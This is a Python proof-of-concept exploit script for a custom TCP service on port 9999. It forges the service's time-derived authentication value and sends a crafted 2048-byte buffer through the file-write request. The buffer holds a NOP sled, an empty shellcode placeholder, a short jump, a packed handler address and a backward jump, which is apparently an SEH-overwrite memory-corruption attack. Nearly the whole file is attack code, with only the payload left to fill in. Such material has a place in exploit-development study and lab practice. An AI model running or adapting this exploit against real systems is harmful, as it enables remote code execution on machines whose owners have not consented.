#!/usr/bin/python
import socket
import sys
from struct import pack
import time
# Target host is the first command-line argument; the service port is fixed.
server, port = sys.argv[1], 9999
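def send_message(s, buffer):
    """Send all of *buffer* on the connected socket *s*.

    Args:
        s: A connected socket object.
        buffer: The bytes to transmit.
    """
    # socket.send() may transmit only part of the data and reports how much it
    # sent; the original discarded that count. sendall() keeps writing until
    # every byte is sent or an error is raised.
    s.sendall(buffer)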
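def get_opcode(now=None):
    """Derive the time-based 32-bit value this client sends first on a connection.

    The result depends only on the low byte of ``int(now) // 10``: it changes
    every ten seconds, repeats every 2560 seconds and has at most 256 distinct
    outputs. It is a pure function of the clock and the constant below, so it
    contains no secret.

    Args:
        now: Unix timestamp in seconds. Defaults to ``time.time()``.

    Returns:
        The value formatted by ``hex()``, e.g. ``'0x74829726'``.
    """
    if now is None:
        now = time.time()

    # Low byte of the ten-second counter. The original took the last two
    # characters of hex(), which gives the same result for any counter >= 0x10.
    val = (int(now) // 10) & 0xFF
    square, cube, fourth = val ** 2, val ** 3, val ** 4

    # cube with its low byte cleared, shifted one nibble, merged with the
    # square, then the low nibble cleared.
    low = (((cube & ~0xFF) << 4) | square) & ~0xF
    # fourth power with its low 12 bits cleared, shifted one byte.
    high = (fourth & ~0xFFF) << 8
    mixed = ((low | high) << 4) | val

    # Keep the low 32 bits with a mask. The original sliced the last eight
    # characters of hex(); for a seven-digit value such as '0x1020408' that
    # slice starts with 'x' and int(..., 16) raised ValueError.
    return hex((mixed & 0xFFFFFFFF) ^ 0x74829726)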
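def write_file(text):
    """Open a connection and issue a write request (opcode 1) carrying *text*.

    Three messages are sent in order: the value from get_opcode() packed as a
    4-byte little-endian integer, the integer 1 packed the same way, and then
    *text* unchanged.

    Args:
        text: Data to send after the two headers; assumed to be bytes, as the
            callers in this file pass -- TODO confirm.
    """
    print("Writing content to file (Opcode 1)")
    opcode = get_opcode()
    print("OTD: %s\n" % opcode)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # try/finally so the socket is closed even when connect or send raises;
    # the original leaked it on any error.
    try:
        s.connect((server, port))
        send_message(s, pack("<L", int(opcode, 16)))
        send_message(s, pack("<L", 0x1))
        send_message(s, text)
    finally:
        s.close()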
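def read_file():
    """Open a connection, issue a read request (opcode 2) and print the reply.

    Two messages are sent in order: the value from get_opcode() packed as a
    4-byte little-endian integer, then the integer 2 packed the same way. A
    single recv() of up to 1024 bytes is printed; a longer reply is not read
    to the end.
    """
    print("Reading content from file (Opcode 2)")
    opcode = get_opcode()
    print("OTD: %s\n" % opcode)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # try/finally so the socket is closed even when connect, send or recv
    # raises; the original leaked it on any error.
    try:
        s.connect((server, port))
        send_message(s, pack("<L", int(opcode, 16)))
        send_message(s, pack("<L", 0x2))
        res = s.recv(1024)
        print(res)
    finally:
        s.close()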
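def delete_file():
    """Open a connection and issue a delete request (opcode 3).

    Two messages are sent in order: the value from get_opcode() packed as a
    4-byte little-endian integer, then the integer 3 packed the same way. No
    reply is read.
    """
    print("Deleting content from file (Opcode 3)")
    opcode = get_opcode()
    print("OTD: %s\n" % opcode)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # try/finally so the socket is closed even when connect or send raises;
    # the original leaked it on any error.
    try:
        s.connect((server, port))
        send_message(s, pack("<L", int(opcode, 16)))
        send_message(s, pack("<L", 0x3))
    finally:
        s.close()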
def main():
    """Run the fixed request sequence: delete, write, write, read.

    The steps are separated by 5-second sleeps. The first write sends 0x800
    bytes of b"E"; the second sends the 2048-byte buffer assembled below.
    ``payload`` is an empty placeholder in this listing.

    NOTE(review): the buffer layout (filler, a packed 32-bit address, padding
    to a fixed length) looks like a proof-of-concept for a memory-corruption
    flaw in the service's write handling -- confirm against the accompanying
    write-up; nothing in this file shows the server side.
    """
    delete_file()
    time.sleep(5)
    # First write: 0x800 (2048) bytes of b"E".
    write_file(b"E"*0x800)
    time.sleep(5)
    payload = b"" # ADD PAYLOAD
    # 24 bytes of 0x90, then the (currently empty) payload.
    buff = b"\x90"*24
    buff += payload
    # Pad with b"A" so the buffer is 806 bytes long at this point.
    buff += b"A"*(806-len(buff))
    # Four literal bytes at offsets 806-809.
    buff += b"\x90\x90\xeb\x04"
    # 32-bit little-endian value; the trailing note is the author's debugger
    # breakpoint command for that address.
    buff += pack("<L", 0x60ae20d3) # bp 0x60ae20d3; g
    # Five more literal bytes.
    buff += b"\xe9\xcd\xfc\xff\xff"
    # Pad with b"D" to a total length of 2048 bytes.
    buff += b"D"*(2048-len(buff))
    write_file(buff)
    time.sleep(5)
    read_file()
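# Run the request sequence only when executed as a script, so importing this
# module (for example to reuse get_opcode) does not open network connections.
if __name__ == "__main__":
    main()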